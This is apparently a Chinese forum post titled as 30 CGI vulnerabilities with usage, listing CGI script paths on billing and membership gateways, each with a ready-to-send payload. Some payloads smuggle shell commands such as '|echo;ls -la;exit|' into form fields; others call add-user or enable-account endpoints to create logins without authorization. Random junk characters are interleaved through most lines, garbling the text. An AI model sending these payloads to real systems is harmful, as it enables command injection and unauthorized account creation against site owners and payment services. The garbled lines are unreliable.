Cgi-bin 30个漏洞＋使用方法

admin

==============================
$ C' h9 ]) A7 A6 b1 v$ v( s7 u
/smspass.pl
username=username&password=password
( _! Z. D5 U$ l: M4 \( }
/index.cgi
. c) f# P# X* ?6 [/ B$ M+ Iwei=ren&gen=command

! L: W9 s# Z0 r2 @6 O/passmaster.cgi
Action=Add&Username=Username&Password=Password
$ o' P4 I8 v( j5 [" k4 x6 l. J
* y" ?# R' }; P0 |( Q- c/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

- _# N6 m3 T% E. ]/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
: @. l1 b" s" R8 B+ c
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
$ R# X- L  x2 q0 ^1 L0 q/ V# Guser=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password
  b! E( l5 O/ C. y- X
/count.cgi
pinfile=|echo;ls -la;exit|

: o' K5 Q! \6 x* m# _0 D1 O/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
* N  |& N8 M0 \0 E: ^- l9 Gvercode=username:password:dseegsow:add:amount<&30>
8 K3 g% c8 L- j: c: S5 P# t* F
/ f6 Q' S- a6 w7 ?+ H8 N/af.cgi
_browser_out=|echo;ls -la;exit;|
" e2 K5 v! R$ @# |& C9 k! r
/modify.cgi
: B( Y$ L' P' e* J5 d8 [$ gusername=username&password=password&expire=30
$ U9 l4 j1 v( L0 L; w; ?* A: ?
8 _( c  m8 r/ b9 A( Y- B. H/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
6 ]9 F) M, e' G
/gx9passwd.cgi
0 }3 j6 [7 u( g$ }5 D+ A+ w3 i" wcmd=ADD&user=username&pass=password

# p& i# r; ?0 w/probecontrol.cgi
command=enable&username=username&password=password

# a$ v3 s& E; f9 ~6 B+ m/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
) w! ~. e+ [2 z5 k" k: @* {% G7 ~
) W9 [- }2 \! |/ v4 _/ }0 w/htadd.pl
configfile=|echo; ls -alt; exit
4 D; ?7 b' g2 e3 \" _/ d& d, P
/gx9passwd.cgi
0 G, u9 o- d4 i. m  X; T) B4 [cmd=ADD&user=username&pass=password
( U( f) F. {# G  d
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
4 `0 Y  B# Y; j: z; C3 e
3 i6 j6 x' ~' M4 X/cpay.cgi
3 q$ \% G. `4 C5 l( v  n. dcommand=add_member&username=username(EMAIL)&password=password(DES)
5 A5 Y& M+ A: Y, t# S
/globill_ut.cgi
* ^5 m4 {( s/ f* g! p1 Zdo=add&username=username&password=password&wpassword=password

0 w- b7 b& u% h/usercontrol.cgi
7 \0 D! T0 q- v$ L7 Y3 Zcommand=enable&username=USER&password=PASS

( G( I" p# H( m/globoSALErum.cgi
1 d3 X9 H, t4 u) z  K4 j& eaction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
4 b. o. o$ h6 d: ?* x/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

% t" a$ D, l$ N  `' E$ Y" T/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
/ h+ Y: E- n% P3 r% G  H6 q
6 N7 u# `. N$ \9 [1 R8 y* U: O  W/af.cgi
/env.cgi
ADD+;echo;pwd;exit
1 ~" j- K* c; I& T* H* d9 y* G2 g
/count.cgi
6 U8 R0 }; [* t* O, y  b3 j" Fpinfile=|echo;pwd;exit|

/recon.cgi
+ K% q4 U) ~# ?  D0 Csearchoption=1&searchfor=|echo;ls%20-al;exit|

$ q9 |& B% Q# I( C7 v0 y/add.cgi
. f2 T* I( p  I0 W, ]username=username&password=password&expire=30

. l" r# U5 D! ^  j& r$ v; B==============================